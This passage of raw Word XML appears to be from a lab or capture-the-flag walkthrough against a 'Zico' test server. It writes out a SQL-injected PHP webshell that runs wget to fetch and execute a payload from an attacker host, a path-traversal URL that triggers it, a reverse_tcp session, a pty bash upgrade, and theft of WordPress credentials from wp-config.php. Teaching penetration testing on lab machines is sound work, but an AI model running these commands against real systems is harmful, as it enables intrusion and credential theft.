          <w:p w14:paraId="48D379CE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7E65BC65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2F471C8" w14:textId="3AAC6D78" w:rsidR="00077BC3" w:rsidRDefault="00077BC3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6AA154B" w14:textId="6C5E0BEC" w:rsidR="001A04B5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Create a new database (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shell.ph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) and insert a SQL instruction to “create a new table” that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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actually </w:t>
      </w:r>
      <w:r w:rsidR="00C055FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>implant</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00C055FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> the shell in Zico server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>. Try the following SQL query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEDF092" w14:textId="77777777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1BC2AA1" w14:textId="14781C9A" w:rsidR="00077BC3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CREATE TABLE '1' ('1' TEXT default '&lt;?php </w:t>
      </w:r>
      <w:proofErr w:type="gram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system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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"cd </w:t>
      </w:r>
      <w:commentRangeStart w:id="13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/</w:t>
      </w:r>
      <w:proofErr w:type="spell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tmp</w:t>
      </w:r>
      <w:commentRangeEnd w:id="13"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009C523A">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="13"/>
      </w:r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; </w:t>
      </w:r>
      <w:commentRangeStart w:id="14"/>
      <w:proofErr w:type="spell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wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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commentRangeEnd w:id="14"/>
      <w:r w:rsidR="009C523A">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="14"/>
      </w:r>
      <w:commentRangeStart w:id="15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http://192.168.56.102/shellDanielDiaz</w:t>
      </w:r>
      <w:commentRangeEnd w:id="15"/>
      <w:r w:rsidR="009C523A">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="15"/>
      </w:r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; </w:t>
      </w:r>
      <w:commentRangeStart w:id="16"/>
      <w:proofErr w:type="spell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chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 777 </w:t>
      </w:r>
      <w:proofErr w:type="spell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shellDanielDiaz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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;</w:t>
      </w:r>
      <w:commentRangeEnd w:id="16"/>
      <w:r w:rsidR="009C523A">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="16"/>
      </w:r>
      <w:r w:rsidRPr="008E2380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commentRangeStart w:id="17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./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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shellDanielDiaz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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"</w:t>
      </w:r>
      <w:commentRangeEnd w:id="17"/>
      <w:r w:rsidR="009C523A">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="17"/>
      </w:r>
      <w:r w:rsidRPr="008E2380">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>); ?&gt;')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D575EA" w14:textId="63197955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3509E39" w14:textId="037711E8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9F69254" w14:textId="535857F6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F336216" w14:textId="7146F182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9ABEA75" w14:textId="634E6970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22FCCD8" w14:textId="0ED26E89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9E73F1C" w14:textId="776CD7A1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599401D" w14:textId="033D5F7F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4853F23" w14:textId="66D3FDCD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DBC9B61" w14:textId="77A1C661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444780B" w14:textId="21BDFAC4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049F098" w14:textId="77777777" w:rsidR="009C523A" w:rsidRDefault="009C523A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5B79624F" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EB20321" w14:textId="20AC258A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(Table creation) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11DF563D" w14:textId="3FFC212D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46918BF8" w14:textId="7C423F02" w:rsidR="00E83DA7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58B39404">
                <v:shape id="_x0000_i1049" type="#_x0000_t75" style="width:442.2pt;height:190.2pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId24" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D1721D2" w14:textId="77777777" w:rsidR="00C055FD" w:rsidRPr="00853EC8" w:rsidRDefault="00C055FD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157D3410" w14:textId="5FDE25D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85E8856" w14:textId="0DA14647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1FD53F8" w14:textId="5ABD558D" w:rsidR="008E2380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C055FD" w:rsidRPr="00853EC8" w14:paraId="59EDE0DD" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68BE72F8" w14:textId="35F105BE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(Validate value of the table) with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="057C6B05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D3D3319" w14:textId="77777777" w:rsidR="00C055FD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425C0DF1">
                <v:shape id="_x0000_i1050" type="#_x0000_t75" style="width:441.5pt;height:172.55pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId25" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="31C47CA0" w14:textId="112255AB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2C87EECC" w14:textId="77777777" w:rsidR="00C055FD" w:rsidRDefault="00C055F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5A8C25A" w14:textId="1CB3CA42" w:rsidR="008E2380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Execute the following URL to make the shell can be downloaded in the Zico Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15924E1A" w14:textId="7F7857F9" w:rsidR="008E2380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commentRangeStart w:id="18"/>
    <w:p w14:paraId="46D3DF5F" w14:textId="64216B1F" w:rsidR="008E2380" w:rsidRDefault="001671E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fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00960C98">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://192.168.56.101/view.php?page=../../usr/databases/shell.php" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00E83DA7" w:rsidRPr="00B96733">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>http://192.168.56.101/view.php?page=../../usr/databases/shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:commentRangeEnd w:id="18"/>
      <w:r w:rsidR="009C523A">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="18"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="711763B8" w14:textId="29597EE2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9657373" w14:textId="798DD917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1CE3307" w14:textId="6E886E21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2F5D8FC" w14:textId="2C91EBBA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50D108B" w14:textId="11408A67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40A4617" w14:textId="492FD4CB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B035413" w14:textId="59BD3F0F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C28FA57" w14:textId="5B18B7EA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E5483D1" w14:textId="6B51D3C5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D362D85" w14:textId="77777777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E83DA7" w:rsidRPr="00853EC8" w14:paraId="4449D757" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00875DAD" w14:textId="07F5B6F4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5CAF274F" w14:textId="4D6FD8F3" w:rsidR="00E83DA7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4683E833">
                <v:shape id="_x0000_i1051" type="#_x0000_t75" style="width:442.2pt;height:173.2pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId26" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="7406CF41" w14:textId="77777777" w:rsidR="00E83DA7" w:rsidRPr="00853EC8" w:rsidRDefault="00E83DA7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5D4407F" w14:textId="77777777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B99372D" w14:textId="4FE68553" w:rsidR="008E2380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D292B53" w14:textId="60848270" w:rsidR="00C772A1" w:rsidRDefault="00C772A1" w:rsidP="00C772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Each time you executed the same URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00B96733">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:bCs/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:lang w:val="en-US" w:eastAsia="es-CO"/>
          </w:rPr>
          <w:t>http://192.168.56.101/view.php?page=../../usr/databases/shell.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="643383F2" w14:textId="180533E7" w:rsidR="00E83DA7" w:rsidRDefault="00C772A1" w:rsidP="00E83DA7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a new shell is </w:t>
      </w:r>
      <w:r w:rsidR="00E83DA7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">created </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in the folder /tmp of the Zico server, </w:t>
      </w:r>
      <w:r w:rsidR="00E83DA7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as seen in the following image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  of the Zico server</w:t>
      </w:r>
      <w:r w:rsidR="00E83DA7">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBDFC73" w14:textId="43865C97" w:rsidR="00E83DA7" w:rsidRPr="00E83DA7" w:rsidRDefault="00E83DA7" w:rsidP="00F57440">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A33BD5F" w14:textId="77777777" w:rsidR="00B77446" w:rsidRPr="00E83DA7" w:rsidRDefault="00B77446" w:rsidP="00F57440">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6A8B58" w14:textId="18C2A3AC" w:rsidR="00B77446" w:rsidRDefault="00960C98" w:rsidP="00E83DA7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noProof/>
        </w:rPr>
        <w:pict w14:anchorId="18629389">
          <v:shape id="_x0000_i1053" type="#_x0000_t75" style="width:409.6pt;height:109.35pt;visibility:visible;mso-wrap-style:square">
            <v:imagedata r:id="rId28" o:title=""/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBA2975" w14:textId="4F378CB5" w:rsidR="008E2380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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211DEC13" w14:textId="13F65319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BDE906A" w14:textId="54572466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0B0AB36" w14:textId="1AA4E4AF" w:rsidR="00E83DA7" w:rsidRDefault="00E83DA7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2E5D727" w14:textId="067BDB3F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896BED3" w14:textId="2A2394AC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20B532A" w14:textId="77825370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DC7E014" w14:textId="57EC4AC9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EFDF3F6" w14:textId="0F84F046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A0260FA" w14:textId="484F55D3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69C54FF" w14:textId="56759034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72A055C" w14:textId="221C9EE6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F08966D" w14:textId="477FA844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7671C49" w14:textId="19B4DF5C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AE980CC" w14:textId="7AFEEAAC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07DBD26" w14:textId="12CE2D9B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AB83BC6" w14:textId="58D9D1B3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74EB7C3" w14:textId="77777777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8926B6A" w14:textId="1E75EA5D" w:rsidR="00E83DA7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Review the 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msfconsole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to see if the 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reverse_tc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was </w:t>
      </w:r>
      <w:commentRangeStart w:id="19"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>stablished</w:t>
      </w:r>
      <w:commentRangeEnd w:id="19"/>
      <w:r w:rsidR="00C772A1">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="19"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CACB718" w14:textId="78F8EE3B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0FABD031" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4107A982" w14:textId="77BA7B3A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48165D76" w14:textId="1D0C63FE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7F64BEDE" w14:textId="002BADB0" w:rsidR="006671EB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56FB424F">
                <v:shape id="_x0000_i1054" type="#_x0000_t75" style="width:441.5pt;height:145.35pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId29" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="651271FC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00D83776" w14:textId="77777777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C3451A0" w14:textId="77777777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70BAE8E" w14:textId="2448CFC1" w:rsidR="0002266D" w:rsidRDefault="0002266D" w:rsidP="0002266D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc17521200"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>FLAG</w:t>
      </w:r>
      <w:r w:rsidRPr="001A04B5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="001A04B5">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> Get the Zico user credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="3215BD4B" w14:textId="77777777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F1471C7" w14:textId="29E94A86" w:rsidR="00E83DA7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Now that the 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reverse_tc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is stablished we do have access to Zico Server. So, get access to the shell with the </w:t>
      </w:r>
      <w:commentRangeStart w:id="21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command shell </w:t>
      </w:r>
      <w:commentRangeEnd w:id="21"/>
      <w:r w:rsidR="00C772A1">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="21"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>and bring a bash with the command</w:t>
      </w:r>
      <w:r w:rsidR="00C772A1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DF9B77" w14:textId="327A694E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commentRangeStart w:id="22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Python -c ‘import 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pty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; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>(“/bin/bash”)’</w:t>
      </w:r>
      <w:commentRangeEnd w:id="22"/>
      <w:r w:rsidR="00C772A1">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="22"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F5B50D" w14:textId="17F39C28" w:rsidR="008E2380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6A2D7C7E" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CEEDE91" w14:textId="0F368EE4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3B14768D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E8C963F" w14:textId="4887723E" w:rsidR="006671EB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226CF1DD">
                <v:shape id="_x0000_i1055" type="#_x0000_t75" style="width:442.2pt;height:66.55pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId30" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="478F93FF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164CAB45" w14:textId="1D269840" w:rsidR="008E2380" w:rsidRDefault="008E238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CAB8A97" w14:textId="010A66F3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71C30A1" w14:textId="5F823461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12052CE" w14:textId="701577A8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29C6B89" w14:textId="45D611DA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077C30C" w14:textId="4D826E96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FD9586C" w14:textId="7021D83C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D716E0E" w14:textId="6397FD74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8E33A55" w14:textId="2041BE00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522C7CA" w14:textId="7257564A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1B9640C8" w14:textId="6E4001B5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88E80C8" w14:textId="7DEF2E3A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BCD6267" w14:textId="7144E2A8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AB82DAE" w14:textId="06BD66B9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B1A7A16" w14:textId="31CA5E48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B8FC427" w14:textId="1564D766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8A8259E" w14:textId="77777777" w:rsidR="00C772A1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A24681D" w14:textId="4A32E702" w:rsidR="006671EB" w:rsidRDefault="00C772A1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>Now you are in the folders of ZICO server!! So, r</w:t>
      </w:r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eview </w:t>
      </w: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all </w:t>
      </w:r>
      <w:r w:rsidR="006671EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>the folders of Zico server, especially /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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zico</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 that is the path where the </w:t>
      </w:r>
      <w:commentRangeStart w:id="23"/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CMS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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commentRangeEnd w:id="23"/>
      <w:r w:rsidR="00537CDB">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="23"/>
      </w:r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is stored. As you can imagine the file </w:t>
      </w:r>
      <w:commentRangeStart w:id="24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wp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 </w:t>
      </w:r>
      <w:commentRangeEnd w:id="24"/>
      <w:r w:rsidR="00537CDB">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="24"/>
      </w:r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is one of the most important in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006671EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t>Wordpress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006671EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="es-CO"/>
        </w:rPr>
        <w:t xml:space="preserve"> because it contains the user data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4700DA" w14:textId="1ACED5C6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59E141E1" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DECAD06" w14:textId="332BA70E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2CB4A39F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79F6F4A5" w14:textId="77777777" w:rsidR="006671EB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0007DB60">
                <v:shape id="_x0000_i1056" type="#_x0000_t75" style="width:442.85pt;height:299.55pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId31" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="4590AA47" w14:textId="28F5D4F1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09444319" w14:textId="77777777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787A071" w14:textId="04AE30F2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commentRangeStart w:id="25"/>
      <w:r w:rsidRPr="006671EB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Download the wp-config.p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hp to a local path, e.g. /root</w:t>
      </w:r>
      <w:commentRangeEnd w:id="25"/>
      <w:r w:rsidR="00537CDB">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="25"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F0640" w14:textId="207FC66E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1B0B7DD4" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="763B6004" w14:textId="03D867D9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commentRangeStart w:id="26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  <w:commentRangeEnd w:id="26"/>
            <w:r w:rsidR="00537CDB">
              <w:rPr>
                <w:rStyle w:val="CommentReference"/>
              </w:rPr>
              <w:commentReference w:id="26"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="2014A841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3B265B0" w14:textId="77777777" w:rsidR="006671EB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60D03E4A">
                <v:shape id="_x0000_i1057" type="#_x0000_t75" style="width:442.2pt;height:57.75pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId32" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="1025F3ED" w14:textId="538796D6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60EC2321" w14:textId="77777777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3618F36" w14:textId="237EFAE9" w:rsidR="008E2380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Validate </w:t>
      </w:r>
      <w:r w:rsidRPr="006671EB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wp-config.p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hp has been effectively downloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74845B2D" w14:textId="14AAB1C1" w:rsidR="00F073E0" w:rsidRDefault="00F073E0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14:paraId="5CBF1B85" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B7168E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lastRenderedPageBreak/>
              <w:t>Replace this screenshot with yours</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="554860D1" w14:textId="77777777" w:rsidR="006671EB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</w:p>
          <w:p w14:paraId="20140E06" w14:textId="77777777" w:rsidR="006671EB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pict w14:anchorId="6C0441D7">
                <v:shape id="_x0000_i1058" type="#_x0000_t75" style="width:442.2pt;height:89.65pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId33" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="243D3FA3" w14:textId="0EE91D41" w:rsidR="006671EB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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53FE5B55" w14:textId="72CA9558" w:rsidR="00F073E0" w:rsidRDefault="00F073E0" w:rsidP="00F57440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7E6512E8" w14:textId="06935BAD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2D57AFA7" w14:textId="29B5CDA7" w:rsidR="00B77446" w:rsidRDefault="006671EB" w:rsidP="00F57440">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="27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Open the file </w:t>
      </w:r>
      <w:r w:rsidRPr="006671EB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wp-config.p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hp to access the USER/PASSWORD for Zico user</w:t>
      </w:r>
      <w:commentRangeEnd w:id="27"/>
      <w:r w:rsidR="00537CDB">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="27"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9F4367" w14:textId="7EE9A80C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6F091936" w14:textId="77777777" w:rsidTr="00853EC8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9054" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B193031" w14:textId="34D97F9E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170191E3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0499EE0C" w14:textId="697B28CF" w:rsidR="006671EB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204DF34A">
                <v:shape id="_x0000_i1059" type="#_x0000_t75" style="width:441.5pt;height:288.7pt;visibility:visible;mso-wrap-style:square">
                  <v:imagedata r:id="rId34" o:title=""/>
                </v:shape>
              </w:pict>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DB976A3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64E0C832" w14:textId="77777777" w:rsidR="006671EB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62B1BBC" w14:textId="77777777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7C650875" w14:textId="7ED3E338" w:rsidR="00B77446" w:rsidRDefault="006671EB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Now, try to connect through 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ssh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to Zico server using the credential that you just found</w:t>
      </w:r>
    </w:p>
